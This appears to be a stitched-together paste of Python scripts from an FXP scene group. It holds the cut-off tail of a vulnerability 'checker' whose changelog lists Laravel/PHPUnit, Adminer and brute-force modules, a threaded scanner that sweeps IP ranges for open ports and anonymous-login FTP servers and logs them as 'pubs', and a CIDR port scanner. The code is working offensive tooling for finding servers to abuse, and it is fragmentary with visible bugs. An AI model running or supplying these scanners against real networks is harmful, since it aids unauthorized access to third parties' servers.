if(re.match("((25[0-5]|2[0-4]\d|1\d\d|[1-9]\d|\d)\.){3}(25[0-5]|2[0-4]\d|1\d\d|[1-9]\d|\d)",ip_port[0]) != None): ip = ip_port[0] port = ip_port[1].split(" ")[0] t = threading.Thread(target=scan.check, args=(ip, port)) t.deamon = False t.start() break else: break return True if __name__ == "__main__": __version__ = "by FXP-T Team - www.fxp-terminal.info" def help(): print "--------------------------------------------------------------------" print " Schm3ckm0-Ch3ck3R v0.5 " print "- .py <file> results.txt <threads> [timeout] " print "-- *** " print "- Respect to: " print " " print "- ddr, b2r, bwc, il, maro, burnz, chucky, " print "- gil, bebop, Gnu, airy, fake, " print "- dodo, mani, Buster and all i foget :D " print "-- *** " print "- " print "- Respect to: " print "- FXP-T Team, [email protected]@R-LightS and Friends, moep, izibitzi, Stylez " print " " print " < Changelog > " print " " print " " print " " print " " print " 28.01.2021 - SSLError Fix , True, False and None , durch getestet " print "-18.01.2021 - diverse path erweiterungen------------------------- " print "-18.01.2021 - module_scan_laravel_and_phpunit hinzugefügt-------- " print "-01.10.2020 - Adminer modul hinzugefügt-------------------------- " print " 03.10.2020 - Scan module erweitert------------------------------ " print " 28.02.2020 - Bug Fixes, Brute Module eing...-------------------- " print " 01.10.2020 - Bug Fixes und kleib tests durchgefürt " print "--------------------------------------------------------------------" if len(sys.argv) == 3: main = main(sys.argv[1]) main.run(sys.argv[2]) elif len(sys.argv) == 4: main = main(sys.argv[1], timeout = sys.argv[3]) main.run(sys.argv[2]) else: help()
  3. """ Port-/FTP-Scanner """ import socket import threading import sys import time import argparse def CheckIfOpen(ip,port): target = (ip,int(port)) try: socket.create_connection(target,1.5) open('open','a').write(ip+":"+str(port)+"\n") print("Port: "+str(port)+" open on IP: "+ip+"!\n") except: print("Port: "+str(port)+" closed on IP: "+ip+"!\n") def CheckIfPub(target): try: server = (target,21) user = "USER anonymous\r\n" pwd = "PASS anonymous\r\n" sock = socket.socket() sock.connect(server) sock.recv(4096) sock.sendall(user.encode()) if "331" in sock.recv(4096).decode('utf-8'): sock.sendall(pwd.encode()) answer = sock.recv(4096).decode('utf-8') if "230" in answer: open('found_ftp','a').write(target+":21 anonymous:anonymous\n") sock.recv(4096) sock.close() elif "530" in answer: sock.close() else: sock.close() except: print("Login failed!\n") pass parser = argparse.ArgumentParser() parser.add_argument("scan", type=str,choices=["ftp","port"],help="decide whether to scan for pubs or ports.") parser.add_argument("ranges",type=str,help="specify the file containing the ranges to scan, format: 123.123.123.123 123.123.123.123") parser.add_argument("-t","--threads",type=int,help="specify amount of threads, else the default will be 100.") parser.add_argument("-p","--ports",type=str,help="specify the port or ports to scan if you decided to scan for open ports. format: port1,port2,port3,...") args = parser.parse_args() if args.threads: threads = args.threads else: threads = 100 ranges = open(args.ranges).read().splitlines() for ipranges in ranges: chain = ipranges.split(" ") start = chain[0].split(".") end = chain[1].split(".") if int(end[3]) != 255: end[3] = int(end[3])+1 else: if int(end[2]) != 255: end[2] = int(end[2])+1 end[3] = 0 else: if int(end[1]) != 255: end[1] = int(end[1])+1 end[2] = 0 end[3] = 0 else: if int(end[0]) != 255: end[0] = int(end[0])+1 end[1] = 0 end[2] = 0 end[3] = 0 end = str(end[0])+"."+str(end[1])+"."+str(end[2])+"."+str(end[3]) current = str(start[0])+"."+str(start[1])+"."+str(start[2])+"."+str(start[3]) if args.scan == "port": try: ports = args.ports.split(",") except: ports = args.ports elif args.scan == "pub": ports = 21 while(current != end): for port in ports: if threading.active_count() <= threads: if args.scan == "port": T = threading.Thread(target=CheckIfOpen,args=(current,int(port),)) elif args.scan == "ftp": T = threading.Thread(target=CheckIfPub,args=(current,)) T.start() else: time.sleep(0.2) if args.scan == "port": T = threading.Thread(target=CheckIfOpen,args=(current,int(port),)) elif args.scan == "ftp": T = threading.Thread(target=CheckIfPub,args=(current,)) T.start() progress = current.split(".") if int(progress[3]) != 255: progress[3] = int(progress[3])+1 else: if int(progress[2]) != 255: progress[2] = int(progress[2])+1 progress[3] = 0 else: if int(end[1]) != 255: progress[1] = int(progress[1])+1 progress[2] = 0 progress[3] = 0 else: if int(progress[0]) != 255: progress[0] = int(progress[0])+1 progress[1] = 0 progress[2] = 0 progress[3] = 0 current = str(progress[0])+"."+str(progress[1])+"."+str(progress[2])+"."+str(progress[3]) open('current_ip','w').write(current) T.join() print("Scan finished!\n") exit()
  4. import ipaddress import socket import sys import threading import time ### # PRIVATE AND INTERNAL PORTSCANNER # BY: jan0x # FOR: FXP-Terminal and Datenreiter # VERSION: 0.1 # HOW: # ranges.txt with ranges in CIDR Notation line by line. # Add Ports in Main function # Switch Modes between "ip" and "port" in Main __init__ function ### ### # Target Generator # Uses a list of ip-networks and ports and returns a target ### class Targets: def __init__(self, mode): self.networks = [] self.ports = [] if mode in ["ip", "port"]: self.mode = mode else: sys.exit("Incorrect scanmode") def add_range(self, cidr_range): self.networks.append(ipaddress.ip_network(cidr_range, strict=False)) def add_ports(self, port_list): for port in port_list: self.add_port(port) def add_port(self, port): # Prevent ports being added when they are already if port not in self.ports: self.ports.append(port) def next_target(self): state = [None] if self.mode == "ip": for network in self.networks: for ip in network.hosts(): for port in self.ports: state = [ip, port] yield state elif self.mode == "port": for port in self.ports: for network in self.networks: for ip in network.hosts(): state = [ip, port] yield state else: sys.exit("Unknown scanmode") ### # Port Scanner logic ### class Scan: def __init__(self, cidr_ranges, ports, thread_count=20, timeout=5, scan_mode="ip"): # Limit the amount of scan_threads self.thread_count = thread_count self.targets = Targets(scan_mode) self.timeout = timeout # Add all networks to target generator for cidr_range in cidr_ranges: self.targets.add_range(cidr_range) # Add all ports to target generator self.targets.add_ports(ports) def run(self): for next_target in self.targets.next_target(): if next_target is not None: time.sleep(self.timeout / self.thread_count) # Throttle a bit scan_thread = threading.Thread(target=self.scan_port, args=(next_target, self.timeout)) scan_thread.start() else: # Prevent CPU load max out time.sleep(0.01) while threading.active_count() != 1: # Wait until all threads are finished excluding the current main thread time.sleep(0.1) # Add target as tuple [ip, port] and get a result. def scan_port(self, target, timeout=5): sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(timeout) ip, port = target try: sock.connect((ip.exploded, port)) with open('results.txt', 'a') as result_file: result_file.write("{}:{}\n".format(ip.exploded, port)) except socket.error as e: e = str(e) return [False, e] return [True] ### # Handle console input ### class Main: def __init__(self): self.ranges = [] with open('ranges.txt', 'r') as range_file: for line in range_file.readlines(): self.ranges.append(line.strip()) self.scanner = Scan(self.ranges, [80, 8080, 443], thread_count=100, timeout=5, scan_mode="port") def run(self): self.scanner.run() main = Main() main.run()